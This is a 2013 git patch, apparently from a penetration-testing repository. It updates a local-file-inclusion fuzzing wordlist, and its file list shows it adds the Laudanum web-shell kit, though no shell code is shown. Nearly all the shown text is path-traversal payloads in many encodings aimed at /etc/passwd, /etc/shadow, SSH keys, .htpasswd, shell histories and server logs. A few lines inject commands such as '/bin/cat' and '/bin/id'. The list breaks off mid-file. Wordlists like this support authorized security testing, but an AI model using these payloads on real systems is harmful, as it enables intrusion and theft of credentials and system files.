From 1574930a758c4f777db5fc6f71954d9a9ae96659 Mon Sep 17 00:00:00 2001 From: jhaddix Date: Fri, 15 Mar 2013 15:44:46 -0700 Subject: [PATCH] updated LFI list and added laudanum shells --- Fuzzing/JHADDIX_LFI.txt | 945 +++++++++--------- .../Web Backdoors/laudanum-0.8/._.DS_Store | Bin 0 -> 82 bytes .../Web Backdoors/laudanum-0.8/CREDITS | 17 + .../Backdoors/Web Backdoors/laudanum-0.8/GPL | 258 +++++ .../Web Backdoors/laudanum-0.8/README | 35 + .../laudanum-0.8/asp/._.DS_Store | Bin 0 -> 82 bytes .../Web Backdoors/laudanum-0.8/asp/dns.asp | 153 +++ .../Web Backdoors/laudanum-0.8/asp/file.asp | 179 ++++ .../Web Backdoors/laudanum-0.8/asp/proxy.asp | 454 +++++++++ .../Web Backdoors/laudanum-0.8/asp/shell.asp | 83 ++ .../laudanum-0.8/aspx/._.DS_Store | Bin 0 -> 82 bytes .../Web Backdoors/laudanum-0.8/aspx/dns.aspx | 144 +++ .../Web Backdoors/laudanum-0.8/aspx/file.aspx | 154 +++ .../laudanum-0.8/aspx/shell.aspx | 129 +++ .../laudanum-0.8/cfm/._.DS_Store | Bin 0 -> 82 bytes .../Web Backdoors/laudanum-0.8/cfm/shell.cfm | 80 ++ .../laudanum-0.8/jsp/._.DS_Store | Bin 0 -> 82 bytes .../Web Backdoors/laudanum-0.8/jsp/cmd.war | Bin 0 -> 1203 bytes .../Web Backdoors/laudanum-0.8/jsp/makewar.sh | 3 + .../laudanum-0.8/jsp/warfiles/._.DS_Store | Bin 0 -> 82 bytes .../jsp/warfiles/META-INF/._.DS_Store | Bin 0 -> 82 bytes .../jsp/warfiles/META-INF/MANIFEST.MF | 3 + .../jsp/warfiles/WEB-INF/._.DS_Store | Bin 0 -> 82 bytes .../laudanum-0.8/jsp/warfiles/WEB-INF/web.xml | 11 + .../laudanum-0.8/jsp/warfiles/cmd.jsp | 41 + .../laudanum-0.8/php/._.DS_Store | Bin 0 -> 82 bytes .../Web Backdoors/laudanum-0.8/php/dns.php | 161 +++ .../Web Backdoors/laudanum-0.8/php/file.php | 195 ++++ .../laudanum-0.8/php/php-reverse-shell.php | 192 ++++ .../Web Backdoors/laudanum-0.8/php/proxy.php | 351 +++++++ .../Web Backdoors/laudanum-0.8/php/shell.php | 409 ++++++++ 31 files changed, 3539 insertions(+), 458 deletions(-) create mode 100644 Scripts/Backdoors/Web Backdoors/laudanum-0.8/._.DS_Store create mode 100644 Scripts/Backdoors/Web Backdoors/laudanum-0.8/CREDITS create mode 100644 Scripts/Backdoors/Web Backdoors/laudanum-0.8/GPL create mode 100644 Scripts/Backdoors/Web Backdoors/laudanum-0.8/README create mode 100644 Scripts/Backdoors/Web Backdoors/laudanum-0.8/asp/._.DS_Store create mode 100644 Scripts/Backdoors/Web Backdoors/laudanum-0.8/asp/dns.asp create mode 100644 Scripts/Backdoors/Web Backdoors/laudanum-0.8/asp/file.asp create mode 100644 Scripts/Backdoors/Web Backdoors/laudanum-0.8/asp/proxy.asp create mode 100644 Scripts/Backdoors/Web Backdoors/laudanum-0.8/asp/shell.asp create mode 100644 Scripts/Backdoors/Web Backdoors/laudanum-0.8/aspx/._.DS_Store create mode 100644 Scripts/Backdoors/Web Backdoors/laudanum-0.8/aspx/dns.aspx create mode 100644 Scripts/Backdoors/Web Backdoors/laudanum-0.8/aspx/file.aspx create mode 100644 Scripts/Backdoors/Web Backdoors/laudanum-0.8/aspx/shell.aspx create mode 100644 Scripts/Backdoors/Web Backdoors/laudanum-0.8/cfm/._.DS_Store create mode 100644 Scripts/Backdoors/Web Backdoors/laudanum-0.8/cfm/shell.cfm create mode 100644 Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/._.DS_Store create mode 100644 Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/cmd.war create mode 100644 Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/makewar.sh create mode 100644 Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/warfiles/._.DS_Store create mode 100644 Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/warfiles/META-INF/._.DS_Store create mode 100644 Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/warfiles/META-INF/MANIFEST.MF create mode 100644 Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/warfiles/WEB-INF/._.DS_Store create mode 100644 Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/warfiles/WEB-INF/web.xml create mode 100644 Scripts/Backdoors/Web Backdoors/laudanum-0.8/jsp/warfiles/cmd.jsp create mode 100644 Scripts/Backdoors/Web Backdoors/laudanum-0.8/php/._.DS_Store create mode 100644 Scripts/Backdoors/Web Backdoors/laudanum-0.8/php/dns.php create mode 100644 Scripts/Backdoors/Web Backdoors/laudanum-0.8/php/file.php create mode 100644 Scripts/Backdoors/Web Backdoors/laudanum-0.8/php/php-reverse-shell.php create mode 100644 Scripts/Backdoors/Web Backdoors/laudanum-0.8/php/proxy.php create mode 100644 Scripts/Backdoors/Web Backdoors/laudanum-0.8/php/shell.php diff --git a/Fuzzing/JHADDIX_LFI.txt b/Fuzzing/JHADDIX_LFI.txt index a49c75e..8c66b3f 100644 --- a/Fuzzing/JHADDIX_LFI.txt +++ b/Fuzzing/JHADDIX_LFI.txt @@ -1,179 +1,352 @@ +/.../.../.../.../.../ +\…..\\\…..\\\…..\\\ %00../../../../../../etc/passwd -%00../../../../../../etc/shadow %00/etc/passwd%00 +%00../../../../../../etc/shadow %00/etc/shadow%00 %0a/bin/cat%20/etc/passwd %0a/bin/cat%20/etc/shadow -%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%255cboot.ini +/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00 %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%00 %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00 -..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini -../../../../../../../../../../../../boot.ini -../../../../../../../../../../../../boot.ini%00 -../../../../../../../../../../../../etc/hosts -../../../../../../../../../../../../etc/hosts%00 -../../../../../../../../../../../../etc/passwd -../../../../../../../../../../../../etc/passwd%00 -../../../../../../../../../../../../etc/shadow -../../../../../../../../../../../../etc/shadow%00 -../../../../../../../../../../../../localstart.asp -../../../../../../../../../../../../localstart.asp%00 -../../../../../../../../conf/server.xml -../../../../../apache/logs/access.log -../../../../../apache/logs/error.log -../../../../../etc/httpd/logs/access.log -../../../../../etc/httpd/logs/access_log -../../../../../etc/httpd/logs/error.log -../../../../../etc/httpd/logs/error_log -../../../../../logs/access.log -../../../../../logs/error.log -../../../../../usr/local/apache/logs/access.log -../../../../../usr/local/apache/logs/access_log -../../../../../usr/local/apache/logs/error.log -../../../../../usr/local/apache/logs/error_log -../../../../../var/log/access_log -../../../../../var/log/apache/access.log -../../../../../var/log/apache/access_log -../../../../../var/log/apache/error.log -../../../../../var/log/apache/error_log -../../../../../var/log/error_log -../../../../../var/log/httpd/access_log -../../../../../var/log/httpd/error_log -../../../../../var/www/logs/access.log -../../../../../var/www/logs/error.log -../../../../../var/www/logs/error_log -../../../../apache/logs/access.log -../../../../apache/logs/error.log -../../../../logs/access.log -../../../../logs/error.log -../../../apache/logs/access.log -../../../apache/logs/error.log -../../../logs/access.log -../../../logs/error.log -../../apache/logs/access.log -../../apache/logs/error.log -../../boot.ini -../../logs/access.log -../../logs/error.log -../apache/logs/access.log -../apache/logs/error.log -../logs/access.log -../logs/error.log -..\..\..\..\..\..\..\..\..\..\boot.ini -..\..\..\..\..\..\..\..\..\..\boot.ini%00 -..\..\..\..\..\..\..\..\..\..\etc\passwd -..\..\..\..\..\..\..\..\..\..\etc\passwd%00 -..\..\..\..\..\..\..\..\..\..\etc\shadow -..\..\..\..\..\..\..\..\..\..\etc\shadow%00 -.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd -.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow -/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00 +%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%255cboot.ini /%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini +/../../../../../../../../%2A /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow -/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd -/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow -/.../.../.../.../.../ -/../../../../../../../../%2A +..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd +..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow +..%2F..%2F..%2F%2F..%2F..%2F%2Fvar%2Fnamed +..%2F..%2F..%2F%2F..%2F..%2Fetc/passwd +..%2F..%2F..%2F%2F..%2F..%2Fetc/shadow +=3D “/..” . “%2f.. +..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/boot.ini +admin/access_log +/admin/install.php +../../../administrator/inbox +/apache2/logs/access_log +/apache2/logs/access.log +/apache2/logs/error_log +/apache2/logs/error.log +/apache/logs/access_log +/apache/logs/access.log +../../../../../apache/logs/access.log +../../../../apache/logs/access.log +../../../apache/logs/access.log +../../apache/logs/access.log +../apache/logs/access.log +/apache/logs/error_log +/apache/logs/error.log +../../../../../apache/logs/error.log +../../../../apache/logs/error.log +../../../apache/logs/error.log +../../apache/logs/error.log +../apache/logs/error.log +/apache\php\php.ini +\\'/bin/cat%20/etc/passwd\\' +\\'/bin/cat%20/etc/shadow\\' +/.bash_history +/.bash_profile +/.bashrc +/../../../../../../../../bin/id| +/bin/php.ini +/boot/grub/grub.conf +/./././././././././././boot.ini /../../../../../../../../../../../boot.ini +/..\../..\../..\../..\../..\../..\../boot.ini +/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini +..//..//..//..//..//boot.ini +../../../../../../../../../../../../boot.ini +../../boot.ini +..\../..\../..\../..\../boot.ini +..\../..\../boot.ini +..\..\..\..\..\..\..\..\..\..\boot.ini +\..\..\..\..\..\..\..\..\..\..\boot.ini /../../../../../../../../../../../boot.ini%00 +../../../../../../../../../../../../boot.ini%00 +..\..\..\..\..\..\..\..\..\..\boot.ini%00 /../../../../../../../../../../../boot.ini%00.html /../../../../../../../../../../../boot.ini%00.jpg -/../../../../../../../../../../../etc/passwd%00.html -/../../../../../../../../../../../etc/passwd%00.jpg -/../../../../../../../../../../etc/passwd -/../../../../../../../../../../etc/passwd^^ -/../../../../../../../../../../etc/shadow -/../../../../../../../../../../etc/shadow^^ -/../../../../../../../../bin/id| -/../../var/www/logs/access_log -/..\../..\../..\../..\../..\../..\../boot.ini -/..\../..\../..\../..\../..\../..\../etc/passwd -/..\../..\../..\../..\../..\../..\../etc/shadow -/./././././././././././boot.ini -/./././././././././././etc/passwd -/./././././././././././etc/shadow -/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini -/NetServer\bin\stable\apache\php.ini -/PHP\php.ini -/Program Files\Apache Group\Apache2\conf\httpd.conf -/Program Files\Apache Group\Apache\conf\httpd.conf -/Program Files\Apache Group\Apache\logs\access.log -/Program Files\Apache Group\Apache\logs\error.log -/Program Files\xampp\apache\conf\httpd.conf -/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf -/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf -/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf -/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php -/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini -/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php -/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php -/Volumes/webBackup/opt/apache2/conf/httpd.conf -/Volumes/webBackup/private/etc/httpd/httpd.conf -/Volumes/webBackup/private/etc/httpd/httpd.conf.default -/WINDOWS\php.ini -/WINNT\php.ini -/apache/logs/access.log -/apache/logs/error.log -/apache2/logs/access.log -/apache2/logs/error.log -/apache\php\php.ini -/bin/php.ini -/etc/apache/apache.conf -/etc/apache/conf/httpd.conf -/etc/apache/httpd.conf +/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd +..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini +/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd +/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow +c:\apache\logs\access.log +c:\apache\logs\error.log +c:\AppServ\MySQL +C:/boot.ini +C:\boot.ini +/C:/inetpub/ftproot/ +C:/inetpub/wwwroot/global.asa +C:\inetpub\wwwroot\global.asa +c:\inetpub\wwwroot\index.asp +/config.asp +../config.asp +config.asp +../config.inc.php +config.inc.php +../config.js +config.js +_config.php +../_config.php +../config.php +config.php +../_config.php%00 +../../../../../../../../conf/server.xml +/core/config.php +/C:\Program Files\ +c:\Program Files\Apache Group\Apache\logs\access.log +c:\Program Files\Apache Group\Apache\logs\error.log +/.cshrc +c:\System32\Inetsrv\metabase.xml +c:WINDOWS/system32/ +d:\AppServ\MySQL +database.asp +database.js +database.php +data.php +dbase.php a +db.php +../../../../../../../dev +/D:\Program Files\ +d:\System32\Inetsrv\metabase.xml /etc/apache2/apache2.conf /etc/apache2/conf/httpd.conf /etc/apache2/httpd.conf /etc/apache2/sites-available/default /etc/apache2/vhosts.d/default_vhost.include +/etc/apache/apache.conf +/etc/apache/conf/httpd.conf +/etc/apache/httpd.conf +/etc/apt/sources.list /etc/chrootUsers +/etc/crontab +/etc/defaultdomain +/etc/default/passwd +/etc/defaultrouter +/etc/fstab /etc/ftpchroot /etc/ftphosts /etc/group +/etc/hostname.bge +/etc/hostname.ce0 +/etc/hostname.ce1 +/etc/hostname.ce2 +/etc/hostname.ce3 +/etc/hostname.dcelx0 +/etc/hostname.dcelx1 +/etc/hostname.dcelx2 +/etc/hostname.dcelx3 +/etc/hostname.dmfe0 +/etc/hostname.dmfe1 +/etc/hostname.dmfe2 +/etc/hostname.dmfe3 +/etc/hostname.dnet0 +/etc/hostname.dnet1 +/etc/hostname.dnet2 +/etc/hostname.dnet3 +/etc/hostname.ecn0 +/etc/hostname.ecn1 +/etc/hostname.ecn2 +/etc/hostname.ecn3 +/etc/hostname.elx0 +/etc/hostname.elx1 +/etc/hostname.elx2 +/etc/hostname.elx3 +/etc/hostname.elxl0 +/etc/hostname.elxl1 +/etc/hostname.elxl2 +/etc/hostname.elxl3 +/etc/hostname.eri0 +/etc/hostname.eri1 +/etc/hostname.eri2 +/etc/hostname.eri3 +/etc/hostname.ge0 +/etc/hostname.ge1 +/etc/hostname.ge2 +/etc/hostname.ge3 +/etc/hostname.hme0 +/etc/hostname.hme1 +/etc/hostname.hme2 +/etc/hostname.hme3 +/etc/hostname.ieef0 +/etc/hostname.ieef1 +/etc/hostname.ieef2 +/etc/hostname.ieef3 +/etc/hostname.iprb0 +/etc/hostname.iprb1 +/etc/hostname.iprb2 +/etc/hostname.iprb3 +/etc/hostname.le0 +/etc/hostname.le1 +/etc/hostname.le2 +/etc/hostname.le3 +/etc/hostname.lo +/etc/hostname.pcn0 +/etc/hostname.pcn1 +/etc/hostname.pcn2 +/etc/hostname.pcn3 +/etc/hostname.qfe0 +/etc/hostname.qfe1 +/etc/hostname.qfe2 +/etc/hostname.qfe3 +/etc/hostname.spwr0 +/etc/hostname.spwr1 +/etc/hostname.spwr2 +/etc/hostname.spwr3 +/etc/hosts +../../../../../../../../../../../../etc/hosts +../../../../../../../../../../../../etc/hosts%00 +/etc/hosts.allow +/etc/hosts.deny +/etc/hosts.equiv /etc/http/conf/httpd.conf -/etc/http/httpd.conf /etc/httpd.conf +/etc/httpd/conf.d/php.conf +/etc/httpd/conf.d/squirrelmail.conf +/etc/httpd/conf.d/ssl.conf /etc/httpd/conf/httpd.conf /etc/httpd/httpd.conf -/etc/httpd/logs/acces.log /etc/httpd/logs/acces_log -/etc/httpd/logs/access.log +/etc/httpd/logs/acces.log +../../../../../../../etc/httpd/logs/acces_log +../../../../../../../etc/httpd/logs/acces.log /etc/httpd/logs/access_log -/etc/httpd/logs/error.log +/etc/httpd/logs/access.log +../../../../../etc/httpd/logs/access_log +../../../../../etc/httpd/logs/access.log /etc/httpd/logs/error_log +/etc/httpd/logs/error.log +../../../../../../../etc/httpd/logs/error_log +../../../../../../../etc/httpd/logs/error.log +../../../../../etc/httpd/logs/error_log +../../../../../etc/httpd/logs/error.log /etc/httpd/php.ini +/etc/http/httpd.conf +/etc/inetd.conf /etc/init.d/apache /etc/init.d/apache2 +/etc/issue /etc/logrotate.d/ftp +/etc/logrotate.d/httpd /etc/logrotate.d/proftpd /etc/logrotate.d/vsftpd.log /etc/mail/access +/etc/mailman/mm_cfg.py +/etc/make.conf +/etc/master.passwd +/etc/motd /etc/my.cnf /etc/mysql/my.cnf -/etc/php.ini -/etc/php/apache/php.ini -/etc/php/apache2/php.ini -/etc/php/cgi/php.ini -/etc/php/php.ini -/etc/php/php4/php.ini +/etc/netconfig +/etc/nsswitch.conf +/etc/opt/ipf/ipf.conf +/etc/opt/ipf/ipnat.conf +/./././././././././././etc/passwd +/../../../../../../../../../../etc/passwd +/../../../../../../../../../../etc/passwd^^ +/..\../..\../..\../..\../..\../..\../etc/passwd +/etc/passwd +../../../../../../../../../../../../../../../../../../../../../../etc/passwd +../../../../../../../../../../../../../../../../../../../../../etc/passwd +../../../../../../../../../../../../../../../../../../../../etc/passwd +../../../../../../../../../../../../../../../../../../../etc/passwd +../../../../../../../../../../../../../../../../../../etc/passwd +../../../../../../../../../../../../../../../../../etc/passwd +../../../../../../../../../../../../../../../../etc/passwd +../../../../../../../../../../../../../../../etc/passwd +../../../../../../../../../../../../../../etc/passwd +../../../../../../../../../../../../../etc/passwd +../../../../../../../../../../../../etc/passwd +../../../../../../../../../../../etc/passwd +../../../../../../../../../../etc/passwd +../../../../../../../../../etc/passwd +../../../../../../../../etc/passwd +../../../../../../../etc/passwd +../../../../../../etc/passwd +../../../../../etc/passwd +../../../../etc/passwd +../../../etc/passwd +../../etc/passwd +../etc/passwd +..\..\..\..\..\..\..\..\..\..\etc\passwd +.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd +\..\..\..\..\..\..\..\..\..\..\etc\passwd +etc/passwd +/etc/passwd%00 +../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00 +../../../../../../../../../../../../../../../../../../../../../etc/passwd%00 +../../../../../../../../../../../../../../../../../../../../etc/passwd%00 +../../../../../../../../../../../../../../../../../../../etc/passwd%00 +../../../../../../../../../../../../../../../../../../etc/passwd%00 +../../../../../../../../../../../../../../../../../etc/passwd%00 +../../../../../../../../../../../../../../../../etc/passwd%00 +../../../../../../../../../../../../../../../etc/passwd%00 +../../../../../../../../../../../../../../etc/passwd%00 +../../../../../../../../../../../../../etc/passwd%00 +../../../../../../../../../../../../etc/passwd%00 +../../../../../../../../../../../etc/passwd%00 +../../../../../../../../../../etc/passwd%00 +../../../../../../../../../etc/passwd%00 +../../../../../../../../etc/passwd%00 +../../../../../../../etc/passwd%00 +../../../../../../etc/passwd%00 +../../../../../etc/passwd%00 +../../../../etc/passwd%00 +../../../etc/passwd%00 +../../etc/passwd%00 +../etc/passwd%00 +..\..\..\..\..\..\..\..\..\..\etc\passwd%00 +\..\..\..\..\..\..\..\..\..\..\etc\passwd%00 +/../../../../../../../../../../../etc/passwd%00.html +/../../../../../../../../../../../etc/passwd%00.jpg +../../../../../../etc/passwd&=%3C%3C%3C%3C /etc/php4.4/fcgi/php.ini -/etc/php4/apache/php.ini /etc/php4/apache2/php.ini +/etc/php4/apache/php.ini /etc/php4/cgi/php.ini -/etc/php5/apache/php.ini /etc/php5/apache2/php.ini +/etc/php5/apache/php.ini /etc/php5/cgi/php.ini +/etc/php/apache2/php.ini +/etc/php/apache/php.ini +/etc/php/cgi/php.ini +/etc/php.d/dom.ini +/etc/php.d/gd.ini +/etc/php.d/imap.ini +/etc/php.d/json.ini +/etc/php.d/ldap.ini +/etc/php.d/mbstring.ini +/etc/php.d/mysqli.ini +/etc/php.d/mysql.ini +/etc/php.d/odbc.ini +/etc/php.d/pdo.ini +/etc/php.d/pdo_mysql.ini +/etc/php.d/pdo_odbc.ini +/etc/php.d/pdo_pgsql.ini +/etc/php.d/pdo_sqlite.ini +/etc/php.d/pgsql.ini +/etc/php.d/xmlreader.ini +/etc/php.d/xmlwriter.ini +/etc/php.d/xsl.ini +/etc/php.d/zip.ini +/etc/php.ini +/etc/php/php4/php.ini +/etc/php/php.ini +/etc/postfix/mydomains /etc/proftp.conf /etc/proftpd/modules.conf /etc/protpd/proftpd.conf /etc/pure-ftpd.conf +/etc/pureftpd.passwd +/etc/pureftpd.pdb /etc/pure-ftpd/pure-ftpd.conf /etc/pure-ftpd/pure-ftpd.pdb /etc/pure-ftpd/pureftpd.pdb -/etc/pureftpd.passwd -/etc/pureftpd.pdb +/etc/release +/etc/resolv.conf +/etc/rpc /etc/security/environ /etc/security/failedlogin /etc/security/group @@ -181,8 +354,28 @@ /etc/security/limits /etc/security/passwd /etc/security/user +/./././././././././././etc/shadow +/../../../../../../../../../../etc/shadow +/../../../../../../../../../../etc/shadow^^ +/..\../..\../..\../..\../..\../..\../etc/shadow /etc/shadow +../../../../../../../../../../../../etc/shadow +..\..\..\..\..\..\..\..\..\..\etc\shadow +.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow +\..\..\..\..\..\..\..\..\..\..\etc\shadow +../../../../../../../../../../../../../../../../../../../../../../etc/shadow%00 +../../../../../../../../../../../../etc/shadow%00 +..\..\..\..\..\..\..\..\..\..\etc\shadow%00 +\..\..\..\..\..\..\..\..\..\..\etc\shadow%00 +etc/shadow%00 +/etc/ssh/sshd_config +/etc/sudoers +/etc/syslog.conf +/etc/syslogd.conf +/etc/system +/etc/updatedb.conf /etc/utmp +/etc/vfstab /etc/vhcs2/proftpd/proftpd.conf /etc/vsftpd.chroot_list /etc/vsftpd.conf @@ -191,71 +384,141 @@ /etc/wu-ftpd/ftpaccess /etc/wu-ftpd/ftphosts /etc/wu-ftpd/ftpusers +/.forward +/home2\bin\stable\apache\php.ini /home/apache/conf/httpd.conf /home/apache/httpd.conf -/home2\bin\stable\apache\php.ini /home\bin\stable\apache\php.ini +/.htpasswd +.htpasswd +../.htpasswd +../install.php +install.php +../../../../../../../../../../../../localstart.asp +../../../../../../../../../../../../localstart.asp%00 +/log/miscDir/accesslog +/.logout +/logs/access_log /logs/access.log +../../../../../logs/access.log +../../../../logs/access.log +../../../logs/access.log +../../logs/access.log +../logs/access.log +/logs/error_log /logs/error.log +../../../../../logs/error.log +../../../../logs/error.log +../../../logs/error.log +../../logs/error.log +../logs/error.log /logs/pure-ftpd.log -/opt/apache/conf/httpd.conf +/master.passwd +member/.htpasswd +members/.htpasswd +/.netrc +/NetServer\bin\stable\apache\php.ini /opt/apache2/conf/httpd.conf -/opt/lampp/logs/access.log +/opt/apache/conf/httpd.conf /opt/lampp/logs/access_log -/opt/lampp/logs/error.log +/opt/lampp/logs/access.log /opt/lampp/logs/error_log +/opt/lampp/logs/error.log /opt/xampp/etc/php.ini -/opt/xampp/logs/access.log /opt/xampp/logs/access_log -/opt/xampp/logs/error.log +/opt/xampp/logs/access.log /opt/xampp/logs/error_log +/opt/xampp/logs/error.log +.pass +../.pass +pass.dat +passwd +/.passwd +.passwd +../.passwd +passwd.dat /php4\php.ini /php5\php.ini /php\php.ini +/PHP\php.ini /private/etc/httpd/httpd.conf /private/etc/httpd/httpd.conf.default +/proc/cpuinfo +/proc/interrupts +/proc/loadavg +/proc/meminfo +/proc/mounts +/proc/net/arp +/proc/net/dev +/proc/net/route +/proc/net/tcp +/proc/partitions /proc/self/cmdline /proc/self/envron -/root/.Xauthority +/proc/version +/.profile +/Program Files\Apache Group\Apache2\conf\httpd.conf +/Program Files\Apache Group\Apache\conf\httpd.conf +/Program Files\Apache Group\Apache\logs\access.log +/Program Files\Apache Group\Apache\logs\error.log +/Program Files\xampp\apache\conf\httpd.conf +/../../../../pswd +/.rhosts /root/.bash_history /root/.bash_logut +root/.htpasswd /root/.ksh_history -/usr/apache/conf/httpd.conf +/root/.Xauthority +/.sh_history +/.shosts +/.ssh/authorized_keys +user/.htpasswd +../users.db.php +users.db.php +users/.htpasswd /usr/apache2/conf/httpd.conf +/usr/apache/conf/httpd.conf /usr/etc/pure-ftpd.conf /usr/lib/cron/log /usr/lib/php.ini /usr/lib/php/php.ini /usr/lib/security/mkuser.default -/usr/local/Zend/etc/php.ini +/usr/local/apache2/conf/httpd.conf +/usr/local/apache2/httpd.conf +/usr/local/apache2/logs/access_log +/usr/local/apache2/logs/access.log +/usr/local/apache2/logs/error_log +/usr/local/apache2/logs/error.log /usr/local/apache/conf/httpd.conf /usr/local/apache/conf/php.ini /usr/local/apache/httpd.conf /usr/local/apache/log /usr/local/apache/logs -/usr/local/apache/logs/access. log -/usr/local/apache/logs/access.log -/usr/local/apache/logs/access_ log /usr/local/apache/logs/access_log -/usr/local/apache/logs/error.log +/usr/local/apache/logs/access_ log +/usr/local/apache/logs/access.log +/usr/local/apache/logs/access. log +../../../../../../../usr/local/apache/logs/access_ log +../../../../../../../usr/local/apache/logs/access. log +../../../../../usr/local/apache/logs/access_log +../../../../../usr/local/apache/logs/access.log /usr/local/apache/logs/error_log -/usr/local/apache2/conf/httpd.conf -/usr/local/apache2/httpd.conf -/usr/local/apache2/logs/access.log -/usr/local/apache2/logs/access_log -/usr/local/apache2/logs/error.log -/usr/local/apache2/logs/error_log -/usr/local/apps/apache/conf/httpd.conf +/usr/local/apache/logs/error.log +../../../../../../../usr/local/apache/logs/error_l og +../../../../../../../usr/local/apache/logs/error.l og +../../../../../usr/local/apache/logs/error_log +../../../../../usr/local/apache/logs/error.log /usr/local/apps/apache2/conf/httpd.conf +/usr/local/apps/apache/conf/httpd.conf /usr/local/cpanel/logs /usr/local/cpanel/logs/access_log /usr/local/cpanel/logs/error_log /usr/local/cpanel/logs/license_log /usr/local/cpanel/logs/login_log /usr/local/cpanel/logs/stats_log +/usr/local/etc/apache2/conf/httpd.conf /usr/local/etc/apache/conf/httpd.conf /usr/local/etc/apache/vhosts.conf -/usr/local/etc/apache2/conf/httpd.conf /usr/local/etc/httpd/conf/httpd.conf /usr/local/etc/httpd/logs/access_log /usr/local/etc/httpd/logs/error_log @@ -264,19 +527,20 @@ /usr/local/etc/pureftpd.pdb /usr/local/httpd/conf/httpd.conf /usr/local/lib/php.ini -/usr/local/php/httpd.conf -/usr/local/php/httpd.conf.php -/usr/local/php/lib/php.ini /usr/local/php4/httpd.conf /usr/local/php4/httpd.conf.php /usr/local/php4/lib/php.ini /usr/local/php5/httpd.conf /usr/local/php5/httpd.conf.php /usr/local/php5/lib/php.ini +/usr/local/php/httpd.conf +/usr/local/php/httpd.conf.php +/usr/local/php/lib/php.ini /usr/local/pureftpd/etc/pure-ftpd.conf /usr/local/pureftpd/etc/pureftpd.pdb /usr/local/pureftpd/sbin/pure-config.pl /usr/local/www/logs/thttpd_log +/usr/local/Zend/etc/php.ini /usr/pkgsrc/net/pureftpd/ /usr/ports/contrib/pure-ftpd/ /usr/ports/ftp/pure-ftpd/ @@ -285,8 +549,6 @@ /usr/spool/lp/log /usr/spool/mqueue/syslog /var/adm -/var/adm/SYSLOG -/var/adm/X0msgs /var/adm/acct/sum/loginlog /var/adm/aculog /var/adm/aculogs @@ -294,10 +556,11 @@ /var/adm/crash/vmcore /var/adm/cron/log /var/adm/dtmp +/var/adm/lastlog /var/adm/lastlog/username /var/adm/log/asppp.log -/var/adm/log/xferlog /var/adm/loginlog +/var/adm/log/xferlog /var/adm/lp/lpd-errs /var/adm/messages /var/adm/pacct @@ -305,56 +568,79 @@ /var/adm/ras/bootlog /var/adm/ras/errlog /var/adm/sulog +/var/adm/SYSLOG /var/adm/utmp /var/adm/utmpx /var/adm/vold.log /var/adm/wtmp /var/adm/wtmpx +/var/adm/X0msgs /var/apache/log /var/apache/logs /var/apache/logs/access_log /var/apache/logs/error_log /var/cpanel/cpanel.config /var/cron/log +/var/lib/mlocate/mlocate.db /var/lib/mysql/my.cnf /var/local/www/conf/php.ini /var/lock/samba /var/log -/var/log/POPlog -/var/log/access.log /var/log/access_log +/var/log/access.log +../../../../../../../var/log/access_log 